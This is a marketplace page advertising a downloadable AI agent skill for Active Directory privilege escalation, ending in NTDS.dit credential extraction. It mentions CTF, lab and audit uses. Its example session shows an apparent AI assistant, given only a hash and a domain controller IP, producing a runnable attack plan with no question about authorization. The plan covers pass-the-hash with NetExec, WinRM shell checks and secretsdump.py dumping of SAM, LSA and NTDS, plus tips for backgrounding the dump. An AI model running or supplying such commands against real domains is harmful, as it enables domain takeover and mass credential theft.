Works with the AI tools you already use

    Claude CodeClaude CodeCursorCursorCodex CLICodex CLIGitHub CopilotGitHub CopilotGemini CLIGemini CLI+20 more

    ad ntds escalation

    1

    Systematic Active Directory escalation ladder from initial foothold to NTDS.dit extraction using NTLM hash reuse.

    Free

    0 installsSecurity scanned
    ad ntds escalation

    ad ntds escalation

    Example session with this skill installed

    I have a low-priv user hash (svc_backup:e9ed21f644e282b3d395759796029857) and the DC IP is 10.10.10.100. Provide an escalation plan to dump NTDS.

    • Read your context and instructions
    • Compiled the ad ntds escalation

    I have mapped the escalation path from the svc_backup service account to a full NTDS dump. I will prioritize clock synchronization first to ensure Kerberos and NTLM operations do not fail due to time skew.

    AD Escalation Plan: 10.10.10.100

    StepActionCommand/ToolObjective
    1Triagenmap -Pn -p445 --script smb2-time 10.10.10.100Sync local clock with DC to prevent auth drift
    2Host Mappingecho "10.10.10.100 corp.local" >> /etc/hostsEnsure Kerberos FQDN resolution
    3Foothold Testnxc winrm 10.10.10.100 -u svc_backup -H e9ed21f6... -d corp.localCheck for direct WinRM shell (Pwn3d!)
    4Lateral Movenxc smb 10.10.10.100 -u svc_backup -H e9ed21f6... --groupsEnumerate BackupAccess or Remote Mgmt groups
    5DC Extractionsecretsdump.py 'corp.local/svc_backup@10.10.10.100' -hashes :e9ed21f6...Dump SAM/LSA/NTDS (Run in background)

    Next steps

    1. Run the nmap time check and adjust your local system time immediately.
    2. Execute the NetExec WinRM check; if it returns Pwn3d!, we have a shell.
    3. If svc_backup has DC admin rights, initiate the secretsdump.py process using nohup or a background multiplexer to avoid timeout during the 5-10 minute NTDS extraction.

    Connects securely to your tools. The creator never sees your data.

    About this skill

    The problem

    Active Directory engagements often stall due to Kerberos time skew or over-complicating the escalation path. Security professionals waste hours debugging authentication failures when a simple NTLM hash reuse or clock sync would have secured a domain foothold.

    What it does

    • Performs initial triage including clock synchronization and FQDN mapping to prevent Kerberos auth blockers.
    • Systematically tests recovered credentials across SMB, WinRM, MSSQL, and LDAP services using pass-the-hash (PTH).
    • Executes an escalation ladder from anonymous LDAP enumeration to service account exploitation and NTDS.dit dumping.
    • Automates domain controller secret extraction using secretsdump.py with background execution to avoid session timeouts.

    Frameworks & tools

    NetExec (nxc), Impacket (secretsdump, getTGT), bloodyAD, and LDAP3.

    Why this beats prompting it yourself

    It enforces a "cheapest-first" methodology that prioritizes hash reuse over noisy exploits. It includes specific tool workarounds, such as forcing NetExec for WinRM hash auth where standard libraries fail, and mandates backgrounding long-running NTDS dumps to prevent data loss.

    Use cases

    • Escalating from a single workstation foothold to Domain Admin in a CTF or lab environment.
    • Auditing Domain Controller security by attempting to dump the SAM, LSA, and NTDS databases.
    • Identifying misconfigured service accounts with WinRM access or Reanimate rights.

    Known limitations

    Requires an existing foothold or credential set to begin the ladder. NTDS dumping requires local administrative privileges on the Domain Controller.

    How to install

    Works the same in every agent - Claude, Cursor, Codex, Copilot and 20+ more.

    ~30 seconds
    1. 1

      Download the ZIP

      Free skills download straight away. Paid skills unlock right after purchase.

    2. 2

      Unzip into your skills folder

      Every agent reads skills from one folder on your machine. Drop the unzipped folder in there.

    3. 3

      Ask your agent to use it

      Restart the agent if it was already running. It picks the skill up automatically - no config needed.

    Skills folder by agent

    Click the path to copy it. Create the folder if it does not exist yet.

    Reviews

    No reviews yet

    Be one of the first to try it. Every listed skill passes our trust checks below.

    Security scanned

    Passed our 8-point scan before listing

    Fresh listing

    Recently published to Agensi

    Free forever

    No account required to browse

    Trust & safety

    Security scanned

    Verified clean today

    • Free to download with an account

    Listedtoday

    Frequently Asked Questions